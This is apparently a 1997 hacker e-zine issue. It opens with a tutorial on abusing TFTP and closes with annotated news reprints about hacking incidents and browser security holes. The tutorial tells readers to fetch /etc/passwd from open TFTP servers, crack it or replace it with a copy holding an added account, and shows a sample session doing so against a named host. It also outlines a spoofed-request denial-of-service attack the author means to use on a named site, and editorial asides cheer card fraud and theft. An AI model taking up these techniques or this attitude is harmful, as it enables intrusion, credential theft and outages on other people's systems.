----------
[TFTP: Weaknesses and Exploits]
What follows is nether a new exploit or a big one. It is simply a small
program with holes that are often overlooked, since it is needed for many
purposes on a UNIX system.
What the hell is it?
^^^^^^^^^^^^^^^^^^^^
TFTP stands for Trival File Transfer Protocol. It is a very simple file
protocol, and it does not have error checking. It is different from FTP in
two main ways. First, it does not log in to the machine it is remotely
getting files from, and Second, it uses UDP ( User Datagram Protocol ) not
TCP. TFTP uses the standard port 69 even though TCP is not used. TFTP is not
used very much , since FTP has more features, and error control. However,
TFTP is often used on diskless workstations and embedded systems. Since TFTP
does not have to use the OS, it can be installed on a tiny EPROM with UDP and
a network driver.
Ok, So What?
^^^^^^^^^^^^
Well, since TFTP uses UDP, no logins are made, and if the sysadmin has not
plugged up tftp or tftpd, then you practically have root, since you can get
any file you wish! While many systems are still open to tftp, many sites have
started to plug up tftp, or even ban connections to it, since security
releases are starting to come out about its holes.
Anyway, since tftp can both get AND send files, you can first get the
sites /etc/passwd, and then upload the new one you added with your new
account that you of course added to the file. However, as far as i know, this
is a limited attack, since tftpd seems to be set up with a default to not get
files, only to put files. But you can still get the file and try to crack it.
[^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^]
[ TFTP Command Set ]
[-------------------------------------------------]
binary Uses binary mode for transfers
connect Connect to server
get Get file
put Put file
trace Displays protocol codes
verbose Displays all information
NOTE: There are 3 modes of transfer available for TFTP to use:
o NetASCII: Standard ASCII, default transfer
o Byte : 8-bit bytes and binary (remember typing in binary?)
o Mail : Indicates destination is a user not a file, info
is transfered as NetASCII.
[An Example TFTP Session]
limbo~#: tftp
tftp> connect smarty.smart.net
tftp> trace
Packet tracing on.
tftp> verbose
Verbose mode on.
tftp> status
Connected to smarty.smart.net
Mode: octet Verbose: on Tracing: on
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds
ftfp> get /etc/passwd (or what ever file you want)
getting from smarty.smart.net:/etc/passwd to /tmp/passwd [octet]
sent RRQ <file=/etc/passwd, mode=octet>
received DATA <block1, 512 bytes>
send ACK <block=1>
received DATA <block2, 512 bytes>
send ACK <block=3>
received DATA <block4, 448 bytes>
send ACK <block=3>
Received 1472 bytes in 0.2 seconds 46080 bits/s
tftp> quit
limbo~#:
So basically, this is what a typically tftp transfer looks like, with most of
the options enabled. Now, dont try this at home, since smart.net's tftp now
only spits out a time out error message when you try this. ( well, you can
try it if you like, but it is pretty much pointless, since you will only get
the error.)
[TFTP Packets]
Well, since TFTP uses UDP as its transport protocol, TFTP uses the
UDP header to encapsulate TFTP protocol information. It uses UDP's source
and destination ports to set the connection up, and it accomplishes this by
the use of TFTP Transfer Identifiers, AKA TIDs, which then places all this
stuff in the headers. Anyway, TFTP uses 5 types of Protocol Data Units,
and they are:
RRQ and WRQ: [ Opcode ][ Filename ][0][ Mode ][0]
( 2 bytes) (String) (String)
DATA : [ Opcode ][ Block Number][0]
( 2 bytes) ( 2 bytes)
ACK : [ Opcode ][ Block Number]
( 2 bytes) ( 2 bytes)
Error : [ Opcode ][ Block Number][Error Message][0]
( 2 bytes) ( 2 bytes) (String)
TFTP Opcodes:
ACK 4 Acknowledgment
DATA 3 Send Data
Error 5 Error
RRQ 1 Read request
WRQ 2 Write request
Ok, So what the hell do I need to know all about the TFTP protocol for?
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Well , its very simple, with this information, you have all you will need to
contruct yet another Denial of Service attack. Write a simple C program that
basically uses one of those easily found IP Spoofers, and then add a system()
call to tftp and ask it to get an odd file, that probably doesnt exist, such
as, well, etc/this.file.doesnt.exist , for example. Then when the server is
trying to reply with an error to a non-existant server, you will be quickly
slowing the remote system to a halt. ( hell, i have an experiment, i am
probably going to write this code out ( i didn't this month since it would
take up alot of room, and i am majorly behind deadline) and see how long it
would take to kill nether.net . I think that i will go down fairly fast since
the server is so fuckin lagged, since it has about a million users on, and
since it is ann arbor's undernet site.)
Well, that is all on TFTP. Check out the files section of our HBS site, since
if i get the TFTP DOS code, i will add it there.
_____________________________________________________________
--------------
--=[The News]=--
Compiled & edited by KungFuFox
--------------
1 : AOL 'Hacker Riot' More Like Amateur Hour
2 : Bug or Feature? Redmond Slow To Respond
3 : Technocops fight hacker threat
4 : Linux Faithful Defuse Bliss Panic
5 : Did Croatian teen hackers break Pentagon codes?
6 : Cracking Enjoys Renaissance in Eastern Europe
7 : Nokia Rolls Out Wireless Pay Phone
8 : Survey sounds alarm about computer crime
9 : NASA Web site briefly closed due to hackers
10: Shockwave Security Hole Leaves Email Exposed
11: H.323: It's 'Open Sesame' in Firewall Speak
12: Go Ahead, Be Paranoid : Hackers Are Out to Get You
13: Threat of 'techno' terrorism being explored
14: Usenet Servers under Assault
15: Usenet News Servers Take a Beating
16: Man waits 20 years for phone line but dies before getting it
17: Only in California... [I love California, but that's the title.]
"Adolescent crackers wreak havoc to get attention and stoke
their egos." -Felipe Rodriquez, Founder of xs4all, a
Holland-based ISP
_____________________________________________________________
AOL 'Hacker Riot' More Like Amateur Hour
by Mark Glaser
[This article made me sick, but I was laughing at the same time]
8:57am PST 17 Feb 97 -- After threatening America Online with a raging
"hacker riot" that would toss people out of chat rooms, cancel accounts, and
spread viruses, the so-called Valentine's Day Massacre was mostly noise and
bluster, signifying nothing.
And many AOL users would have been hard-pressed to tell if there was a riot
going on: They wouldn't have known if any access problems were due to hackers
or AOL's overloaded systems, according to David Cassel, who maintains the AOL
List at aolsucks.org.
A message had been forwarded to hundreds of AOL users, saying that hackers
would rampage at 9 p.m. EST. Planning meetings for the hackers were held at 6
p.m. to plot strategy. At the appointed hour, more than 300 hackers gathered
in private chat rooms and distributed at least seven different programs to
"create hell on AOL," according to one eyewitness.
The hackers then fanned out to public rooms and proceeded to do basic tricks
of the trade: scrolling text too fast to read, kicking out chatters, and
using macros that spewed out text like "RIOT!!! RIOT!!! RIOT!!!" and "Get
Ready to Corrupt." The hackers, who went by screen names such as ReVOLTnow
[Which trade do they think those are 'basic tricks' of? Damn lamers...] and
Lov2HakU, caused havoc into the night but most damage was cosmetic: There
were no reports of viruses or downed servers, and many of the troublemakers
had their rogue accounts cancelled.
The hacking was reportedly a reponse to AOL's recent shoddy service. Many of
[There's that word again, 'hacking'. If I had a nickel for every time I
mistook a warez kiddie for a hacker, I'd be broke.] the hackers trade pirated
software in private chat rooms, named "wares," and were mad at the recent
spate of busy signals due to AOL's ramped-up membership.
But most observers and veteran AOL users attributed the attack to bored
teenagers who were not adept hackers. One AOL chat room guide called the
attack "pretty lame." [At least somebody knows what they're talking about.]
Cassel said that the riot was probably the work of amateurs. "Real hackers
wouldn't publicize their activities in advance," he said. "And AOL is such a
big target with pretty low security (despite what they say). This was an
opportunity for these hackers to send a message to AOL and to pound their chest a bit."
AOL maintains that the riot did only minor damage, and downplayed fears of
viruses by saying that only downloaded and executed files could wreak havoc.
Cassel, a longtime critic of AOL, said that its 3.0 software has the ability
to update users' software without asking permission. If hackers could access
that capability, viruses could be spread and cause a great deal of damage.
Company spokespeople refused to comment on that possibility.
This is not the first such attack on AOL. In the fall of 1995, AOL came down
on software piracy of Macromedia products and punished some hackers. The
piraters exacted revenge by rioting during a Macworld forum, taking over the
stage and reportedly stealing AOL chairman Steve Case's email account.
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
Bug or Feature? Redmond Slow To Respond
by Kate Farnady
[This is the story before microsoft got to edit it.]
11:55am 4.Mar.97.PST -- Microsoft is "too busy looking at the big picture,"
said Paul Greene, the discoverer of the latest Microsoft Explorer 3.0
security hole - a bug that Green says has been in the software since its
release on 13 August 1996. "They're missing the details," he said.
Greene said he happened upon the bug - which can remotely trigger the
execution of files on the user's machine - last week, by accident. He and his
two roommates, Geoff Elliott and Brian Morin, juniors at Worcester
Polytechnic Institute, first notified Microsoft via email at 4 a.m. last
Thursday.
Elliott said Microsoft PR assured him that the bug was not a big deal. In
order for this bug to work, said the email, the perpetrator must have the
aliased program on his hard drive and know where the file is stored.
Greene responded to Microsoft's ambivalence with a public Web site,
Cybersnot, that demonstrates the bug. The site launched on Saturday.
Paul Balle, Microsoft product manager for Internet Explorer, said Microsoft
first learned about the bug on Monday.
"As soon as we found out about it, we immediately deployed a team of project
managers and developers to address the issue," said Balle, who told Wired
News that they had a fix for the bug in testing, and that it would be posted
to Microsoft's Web site within the next 24 hours.
Greene discovered the bug while doing group work, using a Web site to pass
along files. He used the IE option to create a "shortcut," or alias to a file
stored on his hard disk, and then placed it in the HTML on his Web site. The
three students found that by embedding a .lnk or .url tag in the HTML, a user
can create an alias which will open a program on the unsuspecting Web
surfer's desktop.
Says Morin, "Everyone is looking at Java and ActiveX, and not looking closely
enough at what happens when the browser is tied so closely to the desktop."
This bug is unrelated to ActiveX.
"There are plenty of programs that come with Windows that can do a lot of
damage," says Elliott. For example, a link could be created that might
automatically open the format utility that MSIE stores in the Command folder.
This could potentially erase the Web surfer's hard disk. "And that's only one
of the many things that might strike terror in the hearts of PC users," says
Paul.
Further, the three students found that IE's cache folder stores files not in
the folder itself, but in a subdirectory. Unlike Netscape, which scrambles
the file names in the cache folder, IE stores the files, names intact, in a
hidden subdirectory.
"We assume Microsoft suspected this might be a security risk," says Elliott,
"otherwise why would they have created a hidden folder." With access to the
cache subdirectory, a malicious user could make use of the shortcut bug to
place any file on the unsuspecting surfer's hard disk.
But the bug, and Microsoft's ambivalent response to the student's email,
haven't soured these PC users. "Nobody is handling security on the Internet
very well," says Elliott. "We don't know how to connect 6 million computers
with high security. The Web hasn't had the 20 years Unix has had [to develop
security], and even Unix isn't secure."
Elliott told Wired News of spending the morning thinking of ways to use this
bug as a browser virus. "But we're bored of that," he explains. "The sad
thing is, this could really be a great feature," says Greene. "It could be
used to help fix things on your desktop."
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
Technocops fight hacker threat
March 2, 1997
From Correspondent Louise Schiavone
WASHINGTON (CNN) -- When criminals rob a bank, you call the police. When
they break into an office building and threaten mayhem, you call the SWAT
team.
But how about when they break into your computer system and wreak havoc? Is
there someone to call? You bet. Meet CERT -- the Computer Emergency Response
Team.
"Late Friday afternoons are often times of crisis moments for a site. They
may find that their site has been compromised and they can't wait until
Monday to deal with it," explains Kathy Fithen, manager of CERT Daily
Operations.
These -- well, computer nerds -- are the rescue team of the future. And
according to the Justice Department, the future is already here.
"These crimes are becoming more serious, there's more money at stake and the
crimes are more malicious," says Martha Stansell-Gamm of the U.S. Justice
Department. "We are seeing more destruction, more threats, more theft of
valuable information in general." [WE are seeing more corruption, more theft
from the taxpayers, and more lies, so fuck off.]
Not long ago, a hacker invaded Internet access provider Erol's system with
an obscene, racist message for its 140,000 subscribers.
Last summer, hackers broke into the Justice Department's Web site, posting
swastikas and pictures of Adolf Hitler.
And a few years ago, two college students hacked their way into Boeing's
computers in search of password files. The Justice Department says that
situation is a classic case of how hackers can drive up business costs.
"We were also able to ascertain that these hackers had obtained root access
to the federal courthouse system in Seattle. After the case was over, it
cost Boeing, I believe, $57,000 simply to check the integrity of their
avionics data," Stansell-Gamm says.
Based at Carnegie Mellon University in Pittsburgh, CERT works with the
federal government, using mostly Defense Department dollars.
CERT doesn't claim to be a policing agency, and many businesses have their
own team of computer emergency specialists to stay one step ahead of the
technocriminals of the '90s.
In fact, last year a survey of Fortune 1,000 firms found that more than half
had detected attempts to gain computer access. At least 11 attempts were
successful.
_____________________________________________________________
Linux Faithful Defuse Bliss Panic
by Kristi Coale
7:43pm 26.Feb.97.PST -- An anti-virus software company is busily
backpedalling after announcing earlier this month that it had "discovered"
and countered the first Linux virus.
"[Bliss] is a stupid virus," said Joe Wells, a software consultant who
maintains an index of proliferating computer viruses. "It's an alarmist
approach that draws people's attention to something that's not a real threat
and takes their eyes off the things that are boring but more of a threat," he
said.
McAfee Software, a developer of anti-viral software, announced it had
discovered and created an antidote for Bliss on 6 February. The company
claimed that the hostile code was infecting Linux operating systems - a
popular free version of Unix. But the tone of the announcement raised the ire
of Linux users on the blinux-list mailing list.
While McAfee said the Bliss virus wasn't widespread, its announcement
characterized the virus as serious and spreading in the public domain. But
Bliss was not destructive. It was distributed primarily as "proof of concept"
code (i.e., proof that a Linux virus could exist), to people on a security
mailing list who knew what it was.
"I learned a lot of lessons from Bliss," admitted Jimmy Kuo, senior virus
researcher for the Santa Clara, California-based McAfee Software. "Bliss
sounded more scary than it should have been. [In subsequent releases] we have
tried to include more technical information."
Wells said Bliss is an overwriter virus, a piece of code that destroys its
host. Without a host, a virus has little chance of spreading. This led Wells
and other anti-virus experts, including Dave Chess, research staff member at
IBM's Thomas J. Watson Research Laboratory, to conclude that Bliss is not
much of a threat.
Bliss exists mostly for people to run on their systems as a study of virus
behavior, a common practice among those who work on anti-viral technologies,
said Chess. "When it's infecting, it will tell you - infecting:(file name)
and it keeps a log on the disk of the infected files," he said. Further, the
program saves clean copies of every file that it infects.
Kuo, a well-respected anti-virus researcher, said a part of the confusion
over Bliss stemmed from the different interpretations of such expressions as
"in the wild," the phrase the anti-viral community uses to describe a virus
that is in the public domain and therefore poses a threat. To Kuo, a virus
has to meet five criteria before it is "in the wild," including the existence
of a critical mass of users of an operating system.
"Many people are running Linux at home on $800 machines. When the number of
users of a platform goes up, the average user's technical capability goes
down," said Kuo.
Linux had been virus-free since its initial release in 1991. Kuo said it
takes two to three years for viruses to catch up with new operating systems.
With that criterion, Bliss is the sign that Linux has attained the status of
an established platform. Bliss is also a warning that other hostile code
awaits, said Wells, who noted that of the 10,000 viruses in existence, only
200 to 300 pose a real threat.
"[Bliss] will be just like the Boza fiasco [the first Windows 95 virus] last
year, and people will know it's possible to write viruses for Linux," said
Wells.
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
Did Croatian teen hackers break Pentagon codes?
February 20, 1997
ZAGREB, Croatia (Reuter) -- Three teen-age computer hackers in Croatia may
have broken Pentagon protection codes and copied highly classified files
from U. S. military bases, local media reported.
The Zagreb daily Vecernji List said Wednesday that the three high school
students, surfing the Internet on their home computer, applied a search
program and deciphered codes, barging into the database of several military
installations.
The databases included those of the Anderson nuclear installation and an
unnamed satellite research center, the newspaper reported.
However, Pentagon officials expressed doubt this could have happened.
"There is no way that anybody can tap into classified files via the
Internet," Pentagon spokeswoman Lt. Col. Donna Boltz told Reuters.
Such files, she said, are almost always on closed systems without outside
access. But personal e-mail or other sensitive files might be invaded by
hackers on the Internet, she added.
After the news broke, reporters flocked to the high school in the Adriatic
port of Zadar where the three teens, ages 15 and 16, specialize in
mathematics and informatology.
One of the hackers, identified only as V.M., told the state news agency HINA
he accessed the Pentagon data base while surfing the net January 2.
Despite being warned that he was not allowed to proceed, he continued to
browse the site until the data of the Anderson base were displayed on the
screen, HINA said.
"The data are compressed and need to be extracted, so I don't really know
everything they contained, but it sure was very interesting," V.M. told the
agency. [Top-notch ueberleeter wows reporters with a buncha technical jargon
about his oly stumbling block - he couldn't unzip the shit he stole.] He
maintained he was unaware of any possible consequences.
©1997 Reuters Limited.
_____________________________________________________________
Cracking Enjoys Renaissance in Eastern Europe
by Kristi Coale
4:43am 28.Feb.97.PST -- A smoldering indignation lies at the root of the
recent attacks on US Pentagon computers by Eastern European crackers.
The West, and particularly the United States, is a prized target of these
crackers, who see these breaches as an opportunity to jeer at the United
States' perceived technological superiority. The US and other Western
countries are basking in the glow of the information revolution, a movement
that has created a new industry from which many are earning a healthy living.
Meanwhile, life in the former Communist countries of Eastern Europe is less
sanguine. The march toward democratic systems is slow, and jobs are not easy
to find for those with the technological skills. With time on their hands,
they press their knowledge of networks and computer languages into service
via cracking.
"People in Eastern Europe are well-educated, yet they can't make money and
attain living standard of their often less-educated Western peers - which
builds up a resentment," said expatriate Croatian journalist Ivo Skoric via
email.
"So the education basically just makes us unhappy - because we are able to
see and understand how very well fucked up we are: education in this case
gives both tools and reasons to do [cracking]," he said.
In January, three Croatian high school students cracked their way into
Pentagon computers and accessed what they believed to be Pentagon secrets.
The Pentagon, which has said that no classified information was compromised
in the attack, apparently sustained considerable damage - approximately
US$500,000, according to the Zagreb daily newspaper Vecernji List.
The Pentagon refutes these claims. "There was no information or indication
that classified information was accessed," said Major Chris Geisel, Air Force
spokesman. "The amount of the damage won't be determined until after the
investigation is finished." [In other words, "we're still too embarrassed to
tell you how much damage was done."]
In the meantime, the Air Force is working closely with Croatian police to
investigate the incident, Geisel said.
This break-in is one of several originating from Eastern European countries
in recent months. In January, a Romanian teenager set off a series of ping
and syn-flood attacks against a number of IRC servers around the world. And
Bosnia and Croatia have been home to other cracking incidents involving
Pentagon computers, said Skoric. Earlier this month, youths in Zlatar
Bistrica, a small town north of Zagreb, broke into Pentagon computers and had
their equipment seized by Croatian police.
Adolescent crackers wreak havoc to get attention and stoke their egos, said
Felipe Rodriquez, a founder of xs4all, a Holland-based ISP. In the case of
the Croatian high school students, their teacher and parents celebrated their
actions as an achievement made possible by their technical acumen.
But cracking is on the rise in Eastern Europe mostly because people can get
away with it: There are no laws against these activities.
Internet service providers and others in the Eastern European technical
community attribute this gap in law enforcement to the lack of understanding
by the populace that cracking is considered a crime in other countries.
The attacks also stem from a different set of priorities in a region whose
economic and governmental systems are in flux, said Tin Blaskovic, a Croatian
university student.
"You have to understand that countries in transition have bigger problems on
their backs, like stabilizing [a] newly established system," Blaskovic said
via email. "When that is completely done, I believe something will be done
about such problems as cracking."
Western European countries such as Holland channel the energies of crackers
toward developing more secure computer systems.
In Holland, cracking is now illegal, but it used to be a "hacker's haven,"
said Rodriquez, whose ISP employs a number of ex-crackers to develop security
systems. Other former crackers Rodriquez knows are busy developing smartcards
for banks, setting up the first Dutch freenet system, and writing encryption
software. In fact, xs4all, set up by former crackers, was the first ISP in
The Netherlands, Rodriquez said.
"We do not believe hackers should be repressed. Instead, they should be
stimulated to use their talents creatively; to secure poorly designed
systems," he said. [Any hacker that does that is called a fucking sellout.]
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
Nokia Rolls Out Wireless Pay Phone
by Gene Koprowski
2:41pm 4.Mar.97.PST -- Nokia America has introduced a new digital wireless
phone that is designed to bring pay telephone service to buses, subway
trains, and taxi cabs over the global system for mobile (GSM) network. But a
top telecom analyst questioned whether the device would be appropriate for
all those venues. [Big smile]
The small, wireless pay phone, the GSM 1900, was revealed at the Cellular
Telecommunications Industry Association trade show in San Francisco this
week. Nokia spokeswoman Megan Matthews said the product operates over the the
same network technology, GSM, which is employed by Personal Communications
Service Providers.
Nokia has inked deals with the PCS purveyors for trials in "several markets"
to test the 1900-MHz technology on public transportation, she said. Matthews
would not reveal where the products will being tested.
A 900-MHz version of the technology that works with overseas cellular
standards has been sold to phone companies in Thailand. The technology has a
sizable graphical user interface, and hands-free functionality.
"This is an additional way for the new PCS providers to make more money on
their network," said Matthews. "They are able to provide a service that
cannot be achieved by a conventional pay-phone system. You can go and stick
one up on a wall and it will work. You don't need an additional black box.
There is a built-in transceiver."
[Oh what I wouldn't do to rip one of these.]
Matthews says that public wireless phones could have been implemented years
ago, but were not, largely because the cellular-phone market was dominated by
Bell companies, which already had an infrastructure of landline-based pay
phones in place. The price of the phone calls is likely to be priced
comparably to standard wireless phone calls, not at the rate that is akin to
calls for air phones.
"It will probably be very similar to what their air time rates are for
regular wireless subscribers," Matthews said. "It be a lot cheaper (than air
phones on airplanes). If you were in a subway system, you wouldn't want to
pay US$25 for a call. You might as well go to the wire line."
The company does not envision users plunking quarters into the device,
however. Credit cards or charge cards will be used to pay for the services.
The phones can also interact with smart cards or electronic-purse
applications. [Carders, start your engines.]
David Cooperstein, a telecom strategies analyst at Forrester Research, said
the marketers of the technology have to make a compelling argument to users
in order to generate demand. "Pay phones are everywhere in this country,"
says Cooperstein. "If it is going to be more expensive than your typical pay
phone, then there has to be some compelling reason to use it, like it is more
available than the pay phones that are already out there. If it is more
expensive, people would probably just wait a few more minutes to get to the
regular pay phone."
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
Survey sounds alarm about computer crime
March 7, 1997
SAN FRANCISCO (Reuter) -- A computer security group sounded an alarm about
computer crime Thursday after U.S. companies and other organizations it
surveyed reported losing $100 million due to high-tech crime.
[Let's just call it downsizing of profits.]
Three-quarters of the 563 U.S. corporations, government agencies, financial
institutions and universities that responded to the survey by the Computer
Security Institute reported suffering financial losses in the last 12 months
due to computer security breaches.
The breaches ranged from computer viruses and laptop theft to financial
fraud, theft of proprietary information and sabotage.
[Sabotage is not recommended unless your employer is evil.]
Losses suffered by the 249 organizations that were able to estimate them
totaled $100 million in the last year, said the Computer Security Institute,
a San Francisco-based association of information security professionals.
Institute Director Patrice Rapalus said the survey's findings about
financial losses due to security breaches "should sound the alarm for
corporations and government agencies."
She said the level of awareness of computer crime had risen slightly since
the institute carried out its first survey last year but most organizations
still were not doing enough to counter it.
Richard Power, a spokesman for the institute, said it was likely that
computer crime cost billions of dollars each year in the United States,
although this was not based on data from the survey.
Power said there was a need for more information security staff, more
security training for computer network administrators and for greater
cooperation between the private sector and law enforcement.
The organizations reported $24.9 million in losses from financial fraud,
$22.7 million due to telecommunications fraud, $21 million from theft of
proprietary information, $4.3 million from sabotage of data or networks,
$12.5 million from computer viruses and $6.1 million from theft of laptop
computers, the institute said.
[If you count laptops as warez, we got figures on the whole H/P/C/V/A/W
scene's success right there.]
The number of organizations that suffered an intrusion or other unauthorized
use of computer systems in the last 12 months rose to 49 percent in the
latest survey from 42 percent in the 1996 survey, the institute said.
However, only 17 percent of respondents who suffered computer intrusions
reported them to law enforcement, the survey found. Fear of negative
publicity was a key reason organizations did not report them, it found.
©1997 Reuters Limited.
_____________________________________________________________
NASA Web site briefly closed due to hackers
March 7, 1997
CAPE CANAVERAL, Florida (Reuter) -- Computer hackers found their way into
NASA's No. 1 site on the World Wide Web and posted a political manifesto,
forcing the U.S. space agency to take the popular location off-line, a
spokeswoman said Thursday.
The hackers, who called themselves H4G13, left a message online Wednesday
claiming responsibility for the intrusion.
Brian Dunbar, NASA's Internet services manager, said the group berated
officials for jailing well-known hackers and promised to launch an attack on
corporate America for commercial use of the internet.
"During the next month, we the members of H4G13 will be launching an attack
on corporate America. All who profit from the misuse of the Internet will
fall victim to our upcoming reign of digital terrorism," the message said.
[Hopefully skepticism that they won't go through with their threat isn't
accurate.]
The message was up for about half an hour and the site was operating as
usual Thursday morning, Dunbar said.
It was the first time hackers had ever broken into that NASA server, which
is located at the Goddard Space Flight Center in Greenbelt, Maryland. NASA
officials said they would move the public Web page, at www.nasa.gov, to a
new server.
Besides providing information for public use, the server is used by NASA
scientists and researchers to exchange information on solar research. The
data is considered "proprietary," but not classified. It was not clear
whether the hackers had had access to the data.
Dunbar said NASA was investigating the incident.
©1997 Reuters Limited.
_____________________________________________________________
Shockwave Security Hole Leaves Email Exposed
by Michael Stutz
10:02am 13.Mar.97.PST -- Last week, the Web security booby prize went to
Microsoft Internet Explorer. This week, it's Netscape's turn.
The latest hole to be added to the list of recent security gaffes involves
Macromedia Shockwave and Netscape Navigator. A malicious user can read and
copy a Web surfer's private email - including supposedly deleted messages -
without their knowledge, and even access internal Web servers behind
corporate firewalls.
David de Vitry, an application developer at Poppe Tyson Interactive,
discovered the security hole and announced Monday on his Web site that
Netscape users who have installed Macromedia's Shockwave plug-in are at risk.
Shockwave was recently awarded Best World Wide Web Plug-In by the Software
Publisher's Association. Macromedia claims the free software is installed on
more than 20 million desktops.
To demonstrate the flaw, de Vitry set up a Web page that shows how a Web
server can obtain your email upon connecting - no links or forms need be
selected.
"I was just browsing my Netscape Mail and I discovered how Netscape handles
addressing email," said de Vitry, referring to Netscape's use of the mailbox
URN. "It took me by surprise, and [the means] to implement [the hole] just
sort of clicked with my Shockwave experience."
Utilizing the default path to a Windows user's mailbox -
C:/Program Files/Netscape/Navigator/Mail/Inbox - and sending a mailto: query
with Shockwave's GETNETTEXT command, a cracker could develop a Shockwave
movie that reads the user's current email. With a few more commands, that
email could be saved to a data variable and sent back to the Web server,
where it could be copied and saved.
By changing the path from the Inbox to, say, the Trash, a Shockwave movie
could then retrieve email messages that were thought deleted by the user.
"It's much like accessing a file, because you're just accessing a mail file.
With the mailbox URN you can access any file on the system as long as its in
the same format, which is text with email headers," said de Vitry.
"Because of the security model, Java applets can't access files on your
computer. Shockwave doesn't have the same security model," said de Vitry.
"Unlike the other [recent security holes], which allowed you to erase a
person's hard drive (and, through complicated means, obtain information),
this one you can easily get information back. It has interesting uses."
Using these same concepts, it's possible to break the security of corporate
firewalls. "The other main vulnerability," said de Vitry, "is the fact that
it can use [the Web's] hypertext transfer protocol to access any Web server."
Including those on secure intranets - provided you know the URL.
The victim must be using Netscape Navigator 3.0, or possibly 2.0, on either
the Windows 95 or Windows NT platform, and have Macromedia's Shockwave
plug-in installed. Finally, Netscape Email must be used as the email
interface.
While de Vitry claims he informed both Netscape and Macromedia late Tuesday
night, neither company has contacted him.
Dave Kennedy, research team chief with the National Computer Security
Association, commented that "[The security breach] doesn't surprise me, and I
predict it will happen more in the future. Internet Explorer had three last
week, Java had one, and now it's Netscape's turn in the barrel.
"I have more confidence in Netscape than Internet Explorer with respect to
the security of their different products," said Kennedy. "But with the
plug-in problem, my peers in the security community are scared of the
implications of the increased user functions without regard to security," he
said.
Shockwave is Macromedia's proprietary technology for delivering and
experiencing multimedia over the Web for Windows or Macintosh computers. The
plug-in modules are created with Macromedia's Director multimedia authoring
tool.
As of Wednesday evening, Mary Leong of Macromedia said the company had been
unaware of the bug. "The Shockwave team are now in investigation mode in full
force," she said. "We'd really like the opportunity to verify this, and then
offer insight or solution if applicable," she said.
Netscape could not be reached for comment.
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
H.323: It's 'Open Sesame' in Firewall Speak
by Kurt Opprecht
7:30pm 7.Mar.97.PST -- Corporate firewalls, electronic fortresses that
safeguard company secrets, may soon let their guard down a little to allow
Internet telephony to seep through - that is, if everyone involved speaks
the same language.
An industry group led by Intel and Cisco Systems on Thursday completed an
Internet video telephone call through a corporate firewall, a procedure they
say did not compromise the overall security of the network.
The group said this development will make possible multimedia support in
applications like email.
What made the demonstration possible was the use of H.323, an Internet
communications standard for audio and video telephony, said Milind Khare,
product manager in Intel's architecture labs.
With widespread use of this lingua franca in firewall networking and
telephony technologies, all systems should be secure. If a packet speaks
H.323, then the firewall supporting the protocol will recognize it as an
Internet phone call and let it pass into the network. But a packet that
doesn't use H.323 will not be allowed inside.
Still, the notion that a firewall will let some forms of outside
communications into a network could be a little disconcerting to corporate
netizens. Nonetheless, Khare said the prospects for mischievous and malicious
attacks, including spoofed packets masquerading as Internet phone calls, are
not possible.
"As far as we know, [H.323 communications] are not spoofable. Hypothetically,
if you could spoof them, you could do nothing more than conduct an Internet
phone call," Khare said.
Security experts concurred that this allowance represents little compromise
to a corporate network. "Any time you open up a new service that allows any
type of data through, that poses a risk," said Eugene Spafford, professor of
computer science at Purdue University.
The problem, Spafford maintains, is that too many people think of a firewall
as an all-in-one fix to security problems. "It's like saying, if we put a
fence around the building with a guard at the gate we'll never have to worry
about security. That's ridiculous," he said.
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
Go Ahead, Be Paranoid : Hackers Are Out to Get You
March 17, 1997
By STEVE LOHR
In a chilly, windowless room in a New York suburb, four men are tapping
furiously at their laptop computers. Their mission: to crack into the
computer system of a major U.S. corporation.
Things seem to be going well, for them. "All right, we're through the
firewall," announced one bearded hacker. A few moments later, a second
practitioner of high-tech mischief pronounced himself pleased by what he saw
inside -- a digital picture of vulnerability rendered by the lines of
computer code dancing across his screen. "Looks like we can toast it," he
said.
Charles Palmer, a slender, bearded 40-year-old computer scientist, looked
on with pride at the members of his team. Skilled hackers, Palmer noted,
are scarce these days, at least ones that he will hire.
"It's hard to find good people in this field who do not have criminal
records," he explained.
Palmer and his team work for IBM, and their brand of computer hacking is
legal. Companies pay the IBM squad to attack their computer systems to test
how well they can stand up to the increasing assaults by real hackers.
The growing ranks of cyber intruders are engaged in everything from snooping
around to "parking" pornography and pirated software on unsuspecting
corporate machines to computer-assisted fraud and theft.
White-hat hackers, like those at IBM, are only one kind of computer-security
professional whose skills are much in demand today.
Once an arcane specialty, computer security has moved into the mainstream. As
companies rush onto the Internet, they benefit from improved communication
with customers, suppliers and far-flung employees, but they also take on far
greater risk that their corporate computer systems will be breached by
outsiders with malicious intent.
The dangers of a networked world have created boom times for
computer-security consultants, auditors, cryptographers and others. Now they
must contend with pushy headhunters as well as hackers. Five years ago,
six-figure salaries were rare in the security field. Today it is not uncommon
for skilled computer-security veterans to be making $200,000 a year or more.
Recognizing a seller's market for computer-security expertise, Wietse Venema
has come to the United States, and he's selling. A computer scientist from
the University of Eindhoven in the Netherlands, Venema is the co-author of
Satan, a sophisticated software program intended to find security flaws in
any computer system linked to the Internet.
The 45-year-old Dutch researcher is considering offers from IBM and other
leading American computer companies. "Many people are interested in my
capabilities now," he observed cheerfully.
Experts like Venema are suddenly stars because corporations are spending
more on computer security. This year, companies worldwide are expected to
spend $6.3 billion on security for their computer networks, estimates
Dataquest, a market-research firm.
Within three years the security price tag is projected to more than double to
nearly $12.9 billion -- a figure that is only for services supplied by
outside contractors, so it excludes spending
on in-house staff, security
software or hardware products.
The industry in the United States, the world leader in computer security, is
composed of hundreds of companies. They run the gamut from large companies
with worldwide computer consulting practices, like IBM, Science Applications
International Corp. and Perot Systems, and Big Six accounting firms, like
Coopers & Lybrand, Ernst & Young and Deloitte & Touche, down to one-man
independent consultants, like Seiden.
Fueling the surge in computer-security spending is fear. The corporate
concerns are heightened with every report of hackers defacing well-known
World Wide Web sites, like the recent attacks on the sites of the CIA and the
Department of Justice.
The FBI says few intrusions into corporate computer systems -- 15 percent
at most -- are reported to law-enforcement agencies. But the handful that
